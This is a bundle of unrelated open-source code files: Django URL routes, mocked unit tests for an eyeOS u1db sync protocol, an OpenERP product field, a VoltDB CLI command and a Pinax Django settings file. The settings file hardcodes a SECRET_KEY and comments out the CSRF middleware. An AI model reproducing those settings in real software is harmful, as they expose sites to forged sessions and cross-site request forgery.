#(r'administration/search/flush/aips/$', 'administration_search_flush_aips'),
# JSON feeds
(r'status/$', 'status'),
(r'formdata/(?P<type>\w+)/(?P<parent_id>\d+)/(?P<delete_id>\d+)/$', 'formdata_delete'),
(r'formdata/(?P<type>\w+)/(?P<parent_id>\d+)/$', 'formdata'),
)
# Filesystem related JSON views
urlpatterns += patterns('main.filesystem',
(r'filesystem/download/$', 'download'),
(r'filesystem/contents/$', 'contents'),
(r'filesystem/children/$', 'directory_children'),
(r'filesystem/delete/$', 'delete'),
(r'filesystem/copy_to_originals/$', 'copy_to_originals'),
(r'filesystem/copy_to_arrange/$', 'copy_to_arrange'),
(r'filesystem/copy_transfer_component/$', 'copy_transfer_component'),
(r'filesystem/get_temp_directory/$', 'get_temp_directory'),
(r'filesystem/ransfer/$', 'copy_to_start_transfer'),
(r'filesystem/copy_from_arrange/$', 'copy_from_arrange_to_completed')
)
|
cloudspaces/eyeos-u1db
|
eyeos/extern/u1db/ProtocolTest.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'root'
import unittest
from mock import Mock
from Protocol import Protocol
import json
import os
from settings import settings
class ProtocolTest (unittest.TestCase):
def setUp(self):
self.protocol = Protocol(True)
def tearDown(self):
os.remove("test.u1db")
os.remove("test1.u1db")
"""
method: protocol
when: called
with: typeInsertAndList
should: insertCorrect
"""
def test_protocol_called_typeInsertAndList_insertCorrect(self):
if settings[ 'NEW_CODE' ] == "true":
params = '{"type":"insert","lista":[{"cloud":"Stacksync", "user_eyeos":"eyeID_EyeosUser_2","status": "NEW", "is_root": false, "version": 1, "filename": "clients", "parent_id": "null", "server_modified": "2013-03-08 10:36:41.997", "path": "/documents/clients", "client_modified": "2013-03-08 10:36:41.997", "id": 9873615, "user": "eyeos","is_folder":true}]}'
else:
params = '{"type":"insert","lista":[{"user_eyeos":"eyeID_EyeosUser_2","status": "NEW", "is_root": false, "version": 1, "filename": "clients", "parent_id": "null", "server_modified": "2013-03-08 10:36:41.997", "path": "/documents/clients", "client_modified": "2013-03-08 10:36:41.997", "id": 9873615, "user": "eyeos","is_folder":true}]}'
aux = json.loads(params)
self.protocol.insert = Mock()
self.protocol.insert.return_value = True
result = self.protocol.protocol(params)
self.protocol.insert.assert_called_once_with(aux['lista'])
self.assertEquals('true',result)
"""
method: protocol
when: called
with: typeSelectAndList
should: returnArray
"""
def test_protocol_called_typeSelectAndList_returnArray(self):
if settings[ 'NEW_CODE' ] == "true":
params = '{"type":"select","lista":[{"id":"124568", "user_eyeos":"eyeID_EyeosUser_2", "cloud":"Stacksync", "path":"/documents/clients"}]}'
else:
params = '{"type":"select","lista":[{"id":"124568", "user_eyeos":"eyeID_EyeosUser_2", "path":"/documents/clients"}]}'
aux = json.loads(params)
self.protocol.select = Mock()
self.protocol.select.return_value = []
result = self.protocol.protocol(params)
self.protocol.select.assert_called_once_with(aux['lista'][0])
self.assertEquals('[]',result)
"""
method: protocol
when: called
with: typeUpdateAndList
should: updateCorrect
"""
def test_protocol_called_typeUpdateAndList_updateCorrect(self):
if settings[ 'NEW_CODE' ] == "true":
params = '{"type":"update","lista":[{"parent_old":"null"},{"cloud": "Stacksync", "user_eyeos": "eyeID_EyeosUser_2", "status": "NEW", "is_root": false, "version": 1, "filename": "clients", "parent_id": "null", "server_modified": "2013-03-08 10:36:41.997", "path": "/documents/clients", "client_modified": "2013-03-08 10:36:41.997", "id": "9873615", "user": "eyeos","is_folder":true}]}'
else:
params = '{"type":"update","lista":[{"parent_old":"null"},{"user_eyeos":"eyeID_EyeosUser_2","status": "NEW", "is_root": false, "version": 1, "filename": "clients", "parent_id": "null", "server_modified": "2013-03-08 10:36:41.997", "path": "/documents/clients", "client_modified": "2013-03-08 10:36:41.997", "id": "9873615", "user": "eyeos","is_folder":true}]}'
aux = json.loads(params)
self.protocol.update = Mock()
self.protocol.update.return_value = True
result = self.protocol.protocol(params)
self.protocol.update.assert_called_once_with(aux['lista'])
self.assertEquals('true',result)
"""
method: protocol
when: called
with: typeDeleteAndList
should: deleteCorrect
"""
def test_protocol_called_typeDeleteAndList_deleteCorrect(self):
if settings[ 'NEW_CODE' ] == "true":
params = '{"type":"delete","lista":[{"id":1234, "user_eyeos":"eyeID_EyeosUser_2", "cloud": "Stacksync", "parent_id":"3456"},{"id":"8907", "user_eyeos":"eyeID_EyeosUser_2", "cloud": "Stacksync", "parent_id":"3456"}]}'
else:
params = '{"type":"delete","lista":[{"id":1234,"user_eyeos":"eyeID_EyeosUser_2","parent_id":"3456"},{"id":"8907","user_eyeos":"eyeID_EyeosUser_2","parent_id":"3456"}]}'
aux = json.loads(params)
self.protocol.delete = Mock()
self.protocol.delete.return_value = True
result = self.protocol.protocol(params)
self.protocol.delete.assert_called_once_with(aux['lista'])
self.assertEquals('true',result)
"""
method: protocol
when: called
with: typeGetParentAndPath
should: returnArray
"""
def test_protocol_called_typeGetParentAndList_returnArray(self):
if settings[ 'NEW_CODE' ] == "true":
params = '{"type":"parent", "lista":[{"cloud": "Stacksync", "path":"/Documents/", "filename":"prueba", "user_eyeos":"eyeID_EyeosUser_2"}]}'
else:
params = '{"type":"parent", "lista":[{"path":"/Documents/", "filename":"prueba", "user_eyeos":"eyeID_EyeosUser_2"}]}'
aux = json.loads(params)
self.protocol.getParent = Mock()
self.protocol.getParent.return_value = []
result = self.protocol.protocol(params)
self.protocol.getParent.assert_called_once_with(aux[ 'lista' ][0])
self.assertEquals('[]',result)
"""
method: protocol
when: called
with: typeDeleteFolderAndList
should: deleteCorrect
"""
def test_protocol_called_typeDeleteFolderAndList_deleteCorrect(self):
if settings[ 'NEW_CODE' ] == "true":
params = '{"type":"deleteFolder","lista":[{"id":"1234","user_eyeos":"eyeID_EyeosUser_2", "cloud":"Stacksync", "path":"/documents/clients"}]}'
else:
params = '{"type":"deleteFolder","lista":[{"id":"1234","user_eyeos":"eyeID_EyeosUser_2","path":"/documents/clients"}]}'
aux = json.loads(params)
self.protocol.deleteFolder = Mock()
self.protocol.deleteFolder.return_value = True
result = self.protocol.protocol(params)
self.protocol.deleteFolder.assert_called_once_with(aux[ 'lista' ][0])
self.assertEquals('true',result)
"""
method: protocol
when: called
with: typeDeleteMetadataUserAndListUser
should: deleteCorrect
"""
def test_protocol_called_typeDeleteMetadataUserAndListUser_deleteCorrect(self):
params = '{"type":"deleteMetadataUser","lista":[{"user_eyeos":"eyeID_EyeosUser_2"}]}'
self.protocol.deleteMetadataUser = Mock()
self.protocol.deleteMetadataUser.return_value = True
result = self.protocol.protocol(params)
self.protocol.deleteMetadataUser.assert_called_once_with(json.loads(params)['lista'])
self.assertEquals('true',result)
"""
method: protocol
when: called
with: typeDeleteMetadataUserAndListUserAndCloud
should: deleteCorrect
"""
def test_protocol_called_typeDeleteMetadataUserAndListUserAndCloud_deleteCorrect(self):
params = '{"type":"deleteMetadataUser","lista":[{"user_eyeos":"eyeID_EyeosUser_2", "cloud":"Stacksync"}]}'
self.protocol.deleteMetadataUser = Mock()
self.protocol.deleteMetadataUser.return_value = True
result = self.protocol.protocol(params)
self.protocol.deleteMetadataUser.assert_called_once_with(json.loads(params)['lista'])
self.assertEquals('true',result)
"""
method: protocol
when: called
with: typeSelectMetatadataUserAndList
should: returnArray
"""
def test_protocol_called_typeSelectMetadataUserAndList_returnArray(self):
params = '{"type":"selectMetadataUser","lista":[{"user_eyeos":"eyeID_EyeosUser_2"}]}'
self.protocol.selectMetadataUser = Mock()
self.protocol.selectMetadataUser.return_value = []
result = self.protocol.protocol(params)
self.protocol.selectMetadataUser.assert_called_once_with("eyeID_EyeosUser_2")
self.assertEquals('[]',result)
"""
method: protocol
when: called
with: typeRenameMetadataAndUserAndList
"""
def test_protocol_called_typeRenameMetadataAndUserAndList_renameCorrect(self):
if settings[ 'NEW_CODE' ] == "true":
params = '{"type": "rename", "lista": [{"user_eyeos": "eyeID_EyeosUser_2", "cloud": "Stacksync", "status": "NEW", "version": 1, "filename": "prueba.txt", "parent_id": "null", "server_modified": "2013-03-08 10:36:41.997", "path": "/", "client_modified": "2013-03-08 10:36:41.997", "id": "9873615", "user": "eyeos","is_folder":false}]}'
else:
params = '{"type": "rename", "lista": [{"user_eyeos": "eyeID_EyeosUser_2", "status": "NEW", "version": 1, "filename": "prueba.txt", "parent_id": "null", "server_modified": "2013-03-08 10:36:41.997", "path": "/", "client_modified": "2013-03-08 10:36:41.997", "id": "9873615", "user": "eyeos","is_folder":false}]}'
aux = json.loads(params)
self.protocol.renameMetadata = Mock()
self.protocol.renameMetadata.return_value = True
result = self.protocol.protocol(params)
self.protocol.renameMetadata.assert_called_once_with(aux[ 'lista' ][0])
self.assertEquals('true',result)
"""
##################################################################################################################################################
TEST DOWNLOAD FILES
##################################################################################################################################################
"""
"""
method: protocol
when: called
with: typeInsertDownloadVersionAndList
should: insertCorrect
"""
def test_protocol_called_typeInsertDownloadVersionAndList_insertCorrect(self):
if settings[ 'NEW_CODE' ] == "true":
params = '{"type": "insertDownloadVersion", "lista": [{"id": "9873615", "cloud": "Stacksync", "user_eyeos": "eyeID_EyeosUser_2", "version": "2", "recover": false}]}'
else:
params = '{"type": "insertDownloadVersion", "lista": [{"id": "9873615", "user_eyeos": "eyeID_EyeosUser_2", "version": "2", "recover": false}]}'
aux = json.loads(params)
self.protocol.insertDownloadVersion = Mock()
self.protocol.insertDownloadVersion.return_value = True
result = self.protocol.protocol(params)
self.protocol.insertDownloadVersion.assert_called_once_with(aux[ 'lista' ][0])
self.assertEquals('true',result)
"""
method: protocol
when: called
with: typeUpdateDownloadVersionAndList
should: updateCorrect
"""
def test_protocol_called_typeUpdateDownloadVersionAndList_updateCorrect(self):
if settings[ 'NEW_CODE' ] == "true":
params = '{"type": "updateDownloadVersion", "lista": [{"id": "9873615", "cloud": "Stacksync", "user_eyeos": "eyeID_EyeosUser_2", "version": "3", "recover": false}]}'
else:
params = '{"type": "updateDownloadVersion", "lista": [{"id": "9873615", "user_eyeos": "eyeID_EyeosUser_2", "version": "3", "recover": false}]}'
aux = json.loads(params)
self.protocol.updateDownloadVersion = Mock()
self.protocol.updateDownloadVersion.return_value = True
result = self.protocol.protocol(params)
self.protocol.updateDownloadVersion.assert_called_once_with(aux[ 'lista' ][0])
self.assertEquals('true',result)
"""
method: protocol
when: called
with: typeDeleteDownloadVersionAndList
should: deleteCorrect
"""
def test_protocol_called_typeDeleteDownloadVersionAndList_deleteCorrect(self):
params = '{"type":"deleteDownloadVersion","lista":[{"id":"9873615","user_eyeos":"eyeID_EyeosUser_2"}]}'
self.protocol.deleteDownloadVersion = Mock()
self.protocol.deleteDownloadVersion.return_value = True
result = self.protocol.protocol(params)
self.protocol.deleteDownloadVersion.assert_called_once_with("9873615","eyeID_EyeosUser_2")
self.assertEquals('true',result)
"""
method: protocol
when: called
with: typeGetDownloadVersionAndList
should: returnMetadata
"""
def test_protocol_called_typeGetDownloadVersionAndList_returnMetadata(self):
if settings[ 'NEW_CODE' ] == "true":
params = '{"type":"getDownloadVersion","lista":[{"id": "9873615", "user_eyeos": "eyeID_EyeosUser_2", "cloud": "Stacksync"}]}'
expected = {"id": "9873615", "cloud": "Stacksync", "user_eyeos": "eyeID_EyeosUser_2", "version": "3", "recover": False}
else:
params = '{"type":"getDownloadVersion","lista":[{"id": "9873615", "user_eyeos": "eyeID_EyeosUser_2"}]}'
expected = {"id": "9873615", "user_eyeos": "eyeID_EyeosUser_2", "version": "3", "recover": False}
aux = json.loads(params)
self.protocol.getDownloadVersion = Mock()
self.protocol.getDownloadVersion.return_value = expected
result = self.protocol.protocol(params)
self.protocol.getDownloadVersion.assert_called_once_with(aux[ 'lista' ][0])
self.assertEquals(json.dumps(expected), result)
"""
method: protocol
when: called
with: typeRecursiveDeleteVersionAndList
should: deleteCorrect
"""
def test_protocol_called_typeRecursiveDeleteVersionAndList_deleteCorrect(self):
if settings[ 'NEW_CODE' ] == "true":
params = '{"type":"recursiveDeleteVersion","lista":[{"cloud":"Stacksync","id":"9873615","user_eyeos":"eyeID_EyeosUser_2"}]}'
else:
params = '{"type":"recursiveDeleteVersion","lista":[{"id":"9873615","user_eyeos":"eyeID_EyeosUser_2"}]}'
aux = json.loads(params)
self.protocol.recursiveDeleteVersion = Mock()
self.protocol.recursiveDeleteVersion.return_value = True
result = self.protocol.protocol(params)
self.protocol.recursiveDeleteVersion.assert_called_once_with(aux['lista'][0])
self.assertEquals('true',result)
"""
##################################################################################################################################################
TEST CALENDAR
##################################################################################################################################################
"""
"""
method: protocol
when: called
with: typeDeleteEventAndList
should: deleteCorrect
"""
def test_protocol_called_typeDeleteEventAndList_deleteCorrect(self):
params = '{"type":"deleteEvent" , "lista":[{"type":"event","user_eyeos": "eyeos","calendar": "personal", "status":"DELETED" ,"isallday":"0", "timestart": "201419160000", "timeend":"201419170000", "repetition": "None", "finaltype": "1", "finalvalue": "0", "subject": "Visita Médico", "location": "Barcelona", "description": "Llevar justificante"},{"type":"event","user_eyeos": "eyeos","calendarid": "eyeID_Calendar_2b", "isallday": "1", "timestart": "201420160000", "timeend":"201420170000", "repetition": "None", "finaltype": "1", "finalvalue": "0", "subject": "Excursión", "location": "Girona", "description": "Mochila"}]}'
aux = json.loads(params)
self.protocol.deleteEvent = Mock()
self.protocol.deleteEvent.return_value = True
result = self.protocol.protocol(params)
self.protocol.deleteEvent.assert_called_once_with(aux['lista'])
self.assertEquals("true",result)
"""
method: protocol
when: called
with: typeUpdateEventAndList
should: updateCorrect
"""
def test_protocol_called_typeUpdateEventAndList_updateCorrect(self):
params = '{"type":"updateEvent" , "lista":[{"type":"event","user_eyeos": "eyeos","calendar": "personal", "status":"CHANGED", "isallday":"0", "timestart": "201419160000", "timeend":"201419170000", "repetition": "None", "finaltype": "1", "finalvalue": "0", "subject": "Visita Médico", "location": "Barcelona", "description": "Llevar justificante"},{"type":"event","user_eyeos": "eyeos","calendarid": "eyeID_Calendar_2b", "isallday": "1", "timestart": "201420160000", "timeend":"201420170000", "repetition": "None", "finaltype": "1", "finalvalue": "0", "subject": "Excursión", "location": "Girona", "description": "Mochila"}]}'
aux = json.loads(params)
self.protocol.updateEvent = Mock()
self.protocol.updateEvent.return_value = True
result = self.protocol.protocol(params)
self.protocol.updateEvent.assert_called_once_with(aux['lista'])
self.assertEquals("true",result)
"""
method: protocol
when: called
with: typeSelectEventAndList
should: return Array
"""
def test_protocol_called_typeSelectEventAndList_returnArray(self):
params = '{"type":"selectEvent","lista":[{"type":"event","user_eyeos":"eyeos","calendar":"personal"}]}'
aux = json.loads(params)
self.protocol.selectEvent = Mock()
self.protocol.selectEvent.return_value = []
result = self.protocol.protocol(params)
self.protocol.selectEvent.assert_called_once_with("event","eyeos","personal")
self.assertEquals("[]",result)
"""
method: protocol
when: called
with: typeInsertEventAndList
should: insertCorrect
"""
def test_protocol_called_typeInsertEventAndList_insertCorrect(self):
params = '{"type":"insertEvent" , "lista":[{"type":"event","user_eyeos": "eyeos","calendar": "personal", "status":"NEW", "isallday":"0", "timestart": "201419160000", "timeend":"201419170000", "repetition": "None", "finaltype": "1", "finalvalue": "0", "subject": "Visita Médico", "location": "Barcelona", "description": "Llevar justificante"},{"type":"event","user_eyeos": "eyeos","calendarid": "eyeID_Calendar_2b", "isallday": "1", "timestart": "201420160000", "timeend":"201420170000", "repetition": "None", "finaltype": "1", "finalvalue": "0", "subject": "Excursión", "location": "Girona", "description": "Mochila"}]}'
aux = json.loads(params)
self.protocol.insertEvent = Mock()
self.protocol.insertEvent.return_value = True
result = self.protocol.protocol(params)
self.protocol.insertEvent.assert_called_once_with(aux['lista'])
self.assertEquals("true",result)
"""
method: protocol
when: called
with: typeInsertCalendarAndList
should: insertCorrect
"""
def test_protocol_called_typeInsertCalendarAndList_insertCorrect(self):
params = '{"type":"insertCalendar" , "lista":[{"type":"calendar","user_eyeos": "eyeos","name": "personal", "status":"NEW","description":"personal calendar","timezone":0}]}'
aux = json.loads(params)
self.protocol.insertCalendar = Mock()
self.protocol.insertCalendar.return_value = True
result = self.protocol.protocol(params)
self.protocol.insertCalendar.assert_called_once_with(aux['lista'])
self.assertEquals("true",result)
"""
method: protocol
when: called
with: typeDeleteCalendarAndList
should: deleteCorrect
"""
def test_protocol_called_typeDeleteCalendarAndList_deleteCorrect(self):
params = '{"type":"deleteCalendar" , "lista":[{"type":"calendar","user_eyeos": "eyeos","name": "personal"}]}'
aux = json.loads(params)
self.protocol.deleteCalendar = Mock()
self.protocol.deleteCalendar.return_value = True
result = self.protocol.protocol(params)
self.protocol.deleteCalendar.assert_called_once_with(aux['lista'])
self.assertEquals("true",result)
"""
method: protocol
when: called
with: typeSelectCalendarAndList
should: returnArray
"""
def test_protocol_called_typeSelectCalendarAndList_returnArray(self):
params = '{"type":"selectCalendar" , "lista":[{"type":"calendar","user_eyeos": "eyeos"}]}'
aux = json.loads(params)
self.protocol.selectCalendar = Mock()
self.protocol.selectCalendar.return_value = []
result = self.protocol.protocol(params)
self.protocol.selectCalendar.assert_called_once_with(aux['lista'][0])
self.assertEquals("[]",result)
"""
method: protocol
when: called
with: typeUpdateCalendarAndList
should: updateCorrect
"""
def test_protocol_called_typeUpdateCalendarAndList_updateCorrect(self):
params = '{"type":"updateCalendar" , "lista":[{"type":"calendar","user_eyeos": "eyeos","name":"personal","description":"personal calendar","timezone":0,"status":"CHANGED"}]}'
aux = json.loads(params)
self.protocol.updateCalendar = Mock()
self.protocol.updateCalendar.return_value = True
result = self.protocol.protocol(params)
self.protocol.updateCalendar.assert_called_once_with(aux['lista'])
self.assertEquals("true",result)
"""
method: protocol
when: called
with: typeDeleteCalendarUserAndList
should: deleteCorrect
"""
def test_protocol_called_typeDeleteCalendarUserAndList_deleteCorrect(self):
params = '{"type":"deleteCalendarUser","lista":[{"user_eyeos":"eyeos"}]}'
self.protocol.deleteCalendarUser = Mock()
self.protocol.deleteCalendarUser.return_value = True
result = self.protocol.protocol(params)
self.protocol.deleteCalendarUser.assert_called_once_with("eyeos")
self.assertEquals('true',result)
"""
method: protocol
when: called
with: selectCalendarsAndEventsAndList
should: returnArray
"""
def test_protocol_called_selectCalendarsAndEventsAndList_returnArray(self):
params = '{"type":"selectCalendarsAndEvents","lista":[{"user_eyeos":"eyeos"}]}'
self.protocol.selectCalendarsAndEvents = Mock()
self.protocol.selectCalendarsAndEvents.return_value = []
result = self.protocol.protocol(params)
self.protocol.selectCalendarsAndEvents.assert_called_once_with("eyeos")
self.assertEquals('[]',result)
"""
##################################################################################################################################################
TEST LOCK FILE
##################################################################################################################################################
"""
"""
method: protocol
when: called
with: typeGetMetadataFileAndList
should: returnArray
"""
def test_protocol_called_typeGetMetadataFileAndList_returnArray(self):
params = '{"type":"getMetadataFile","lista":[{"id":"124568","cloud":"Stacksync"}]}'
self.protocol.getMetadataFile = Mock()
self.protocol.getMetadataFile.return_value = []
result = self.protocol.protocol(params)
self.protocol.getMetadataFile.assert_called_once_with("124568","Stacksync")
self.assertEquals('[]',result)
"""
method: protocol
when: called
with: typeLockFileAndList
should: correctBlock
"""
def test_protocol_called_typeLockFileAndList_returnCorrectBlock(self):
params = '{"type":"lockFile","lista":[{"id":"124568","cloud":"Stacksync","username":"eyeos","IpServer":"192.168.56.101","datetime":"2015-05-12 10:50:00","status":"open","timeLimit":10}]}'
aux = json.loads(params)
self.protocol.lockFile = Mock()
self.protocol.lockFile.return_value = True
result = self.protocol.protocol(params)
self.protocol.lockFile.assert_called_once_with(aux['lista'][0])
self.assertEquals('true',result)
"""
method: protocol
when: called
with: typeUpdateDateTimeAndList
should: updateCorrect
"""
def test_protocol_called_typeUpdateDateTimeAndList_returnCorrectBlock(self):
params = '{"type":"updateDateTime","lista":[{"id":"124568","cloud":"Stacksync","username":"eyeos","IpServer":"192.168.56.101","datetime":"2015-05-12 10:50:00","status":"open"}]}'
aux = json.loads(params)
self.protocol.updateDateTime = Mock()
self.protocol.updateDateTime.return_value = True
result = self.protocol.protocol(params)
self.protocol.updateDateTime.assert_called_once_with(aux['lista'][0])
self.assertEquals('true',result)
"""
method: protocol
when: called
with: typeUnLockFileAndList
should: returnCorrectUnBlock
"""
def test_protocol_called_typeUnLockFileAndList_returnCorrectUnBlock(self):
params = '{"type":"unLockFile","lista":[{"id":"124568","cloud":"Stacksync","username":"eyeos","IpServer":"192.168.56.101","datetime":"2015-05-12 10:50:00","status":"close"}]}'
aux = json.loads(params)
self.protocol.unLockFile = Mock()
self.protocol.unLockFile.return_value = True
result = self.protocol.protocol(params)
self.protocol.unLockFile.assert_called_once_with(aux['lista'][0])
self.assertEquals('true',result)
|
codeback/openerp-cbk_product_web_visible
|
product.py
|
# -*- encoding: utf-8 -*-
##############################################################################
#
# res_partner
# Copyright (c) 2013 Codeback Software S.L. (http://codeback.es)
# @author: Miguel García <miguel@codeback.es>
# @author: Javier Fuentes <javier@codeback.es>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from osv import fields, osv
from datetime import datetime, timedelta
from openerp.tools.translate import _
class product_product(osv.osv):
"""añadimos los nuevos campos"""
_name = "product.product"
_inherit = "product.product"
_columns = {
'web_visible': fields.boolean(string='Web Visible')
}
|
eoneil1942/voltdb-4.7fix
|
lib/python/voltcli/voltdb.d/create.py
|
# This file is part of VoltDB.
# Copyright (C) 2008-2014 VoltDB Inc.
#
# This file contains original code and/or modifications of original code.
# Any modifications made by VoltDB Inc. are licensed under the following
# terms and conditions:
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
@VOLT.Command(
bundles = VOLT.ServerBundle('create',
needs_catalog=True,
supports_live=False,
default_host=True,
safemode_available=False,
supports_daemon=True),
options = (
# Hidden option to restore the hashinator in addition to the tables.
VOLT.BooleanOption('-r', '--replica', 'replica', 'start replica cluster', default = False),
),
description = 'Start a new, empty database.'
)
def create(runner):
runner.go()
|
markherringer/waywayd
|
settings.py
|
# -*- coding: utf-8 -*-
# Django settings for basic pinax project.
import os.path
import posixpath
import pinax
PINAX_ROOT = os.path.abspath(os.path.dirname(pinax.__file__))
PROJECT_ROOT = os.path.abspath(os.path.dirname(__file__))
# tells Pinax to use the default theme
PINAX_THEME = "default"
DEBUG = False
TEMPLATE_DEBUG = DEBUG
# tells Pinax to serve media through the staticfiles app.
SERVE_MEDIA = DEBUG
INTERNAL_IPS = [
"127.0.0.1",
]
ADMINS = [
# ("Your Name", "your_email@domain.com"),
]
MANAGERS = ADMINS
# Local time zone for this installation. Choices can be found here:
# http://www.postgresql.org/docs/8.1/static/datetime-keywords.html#DATETIME-TIMEZONE-SET-TABLE
# although not all variations may be possible on all operating systems.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = "US/Eastern"
# Language code for this installation. All choices can be found here:
# http://www.w3.org/TR/REC-html40/struct/dirlang.html#langcodes
# http://blogs.law.harvard.edu/tech/stories/storyReader$15
LANGUAGE_CODE = "en"
USE_I18N = True
ugettext = lambda s: s
LANGUAGES = (
('en', u'English'),
('it', u'Italiano'),
)
CMS_LANGUAGES = LANGUAGES
# Make English the default language
DEFAULT_LANGUAGE = 1
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
USE_L10N = True
# Absolute path to the directory that holds media.
# Example: "/home/media/media.lawrence.com/"
MEDIA_ROOT = os.path.join(PROJECT_ROOT, 'site_media', 'media')
# URL that handles the media served from MEDIA_ROOT.
# Example: "http://media.lawrence.com"
MEDIA_URL = '/site_media/media/'
# Absolute path to the directory that holds static files like app media.
# Example: "/home/media/media.lawrence.com/apps/"
STATIC_ROOT = os.path.join(PROJECT_ROOT, 'site_media', 'static')
# URL that handles the static files like app media.
# Example: "http://media.lawrence.com"
STATIC_URL = '/site_media/static/'
# Additional directories which hold static files
STATICFILES_DIRS = (
('basic071', os.path.join(PROJECT_ROOT, 'media')),
('pinax', os.path.join(PINAX_ROOT, 'media', PINAX_THEME)),
)
ADMIN_MEDIA_PREFIX = posixpath.join(STATIC_URL, "admin/")
# 1.2
#MEDIA_ROOT = os.path.join(PROJECT_ROOT, "site_media", "media")
#MEDIA_URL = "/site_media/media/"
OLWIDGET_MEDIA_URL = "/site_media/static/olwidget/"
#STATIC_ROOT = os.path.join(PROJECT_ROOT, "site_media", "static")
#STATIC_URL = "/site_media/static/"
#STATICFILES_DIRS = [
# os.path.join(PROJECT_ROOT, "media"),
# os.path.join(PINAX_ROOT, "media", PINAX_THEME),
#]
#ADMIN_MEDIA_PREFIX = posixpath.join(STATIC_URL, "admin/")
# Make this unique, and don"t share it with anybody.
SECRET_KEY = "wdsk$eseb7-11y_kb%r$j)%azk-0&l*v#q0$j0d2e%aqcna+l$"
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = [
"django.template.loaders.filesystem.load_template_source",
"django.template.loaders.app_directories.load_template_source",
]
MIDDLEWARE_CLASSES = [
'django.middleware.cache.UpdateCacheMiddleware',
"django.middleware.common.CommonMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
#"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django_openid.consumer.SessionConsumer",
#"django.contrib.messages.middleware.MessageMiddleware",
"middleware.LocaleMiddleware",
"django.middleware.doc.XViewMiddleware",
"pagination.middleware.PaginationMiddleware",
"pinax.middleware.security.HideSensistiveFieldsMiddleware",
'middleware.MultilingualURLMiddleware',
'middleware.DefaultLanguageMiddleware',
#"debug_toolbar.middleware.DebugToolbarMiddleware",
'django.middleware.cache.FetchFromCacheMiddleware',
"flatpages.middleware.FlatpageFallbackMiddleware",
]
ROOT_URLCONF = "urls"
TEMPLATE_DIRS = [
os.path.join(PROJECT_ROOT, "templates"),
os.path.join(PINAX_ROOT, "templates", PINAX_THEME),
]
TEMPLATE_CONTEXT_PROCESSORS = [
"django.core.context_processors.auth",
"django.core.context_processors.debug",
"django.core.context_processors.i18n",
"django.core.context_processors.media",
"django.core.context_processors.request",
#"django.contrib.messages.context_processors.messages",
"pinax.core.context_processors.pinax_settings",
"notification.context_processors.notification",
"announcements.context_processors.site_wide_announcements",
"account.context_processors.openid",
"account.context_processors.account",
"multilingual.context_processors.multilingual",
]
INSTALLED_APPS = [
# included
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.sites",
#"django.contrib.messages",
"django.contrib.humanize",
"django.contrib.gis",
"django.contrib.sitemaps",
"flatpages",
"pinax.templatetags",
# external
"notification", # must be first
"django_openid",
"emailconfirmation",
"mailer",
"announcements",
"pagination",
"timezones",
"ajax_validation",
"uni_form",
"staticfiles",
#"debug_toolbar",
#added to basic_project
"django_extensions",
"tagging",
# internal (for now)
"basic_profiles",
"account",
"signup_codes",
"about",
# non-pinax
"rosetta",
# ours
"olwidget",
"attractions",
"django_extensions",
"multilingual",
]
#MESSAGE_STORAGE = "django.contrib.messages.storage.session.SessionStorage"
ABSOLUTE_URL_OVERRIDES = {
"auth.user": lambda o: "/profiles/profile/%s/" % o.username,
}
MARKUP_FILTER_FALLBACK = "none"
MARKUP_CHOICES = [
("restructuredtext", u"reStructuredText"),
("textile", u"Textile"),
("markdown", u"Markdown"),
("creole", u"Creole"),
]
WIKI_MARKUP_CHOICES = MARKUP_CHOICES
AUTH_PROFILE_MODULE = "basic_profiles.Profile"
NOTIFICATION_LANGUAGE_MODULE = "account.Account"
ACCOUNT_OPEN_SIGNUP = True
ACCOUNT_REQUIRED_EMAIL = False
ACCOUNT_EMAIL_VERIFICATION = False
ACCOUNT_EMAIL_AUTHENTICATION = False
ACCOUNT_UNIQUE_EMAIL = EMAIL_CONFIRMATION_UNIQUE_EMAIL = False
if ACCOUNT_EMAIL_AUTHENTICATION:
AUTHENTICATION_BACKENDS = [
"account.auth_backends.EmailModelBackend",
]
else:
AUTHENTICATION_BACKENDS = [
"django.contrib.auth.backends.ModelBackend",
]
EMAIL_CONFIRMATION_DAYS = 2
EMAIL_DEBUG = DEBUG
CONTACT_EMAIL = ""
SITE_NAME = ""
LOGIN_URL = "/account/login/"
LOGIN_REDIRECT_URLNAME = "what_next"
DEBUG_TOOLBAR_CONFIG = {
"INTERCEPT_REDIRECTS": False,
}
LANGUAGE_HREF_IGNORES = ['sitemap']
# local_settings.py can be used to override environment-specific settings
# like database and email that differ between development and production.
try:
from local_settings import *
except ImportError:
pass
FORCE_LOWERCASE_TAGS = True
#CACHE_BACKEND = "memcached://127.0.0.1:11211/"
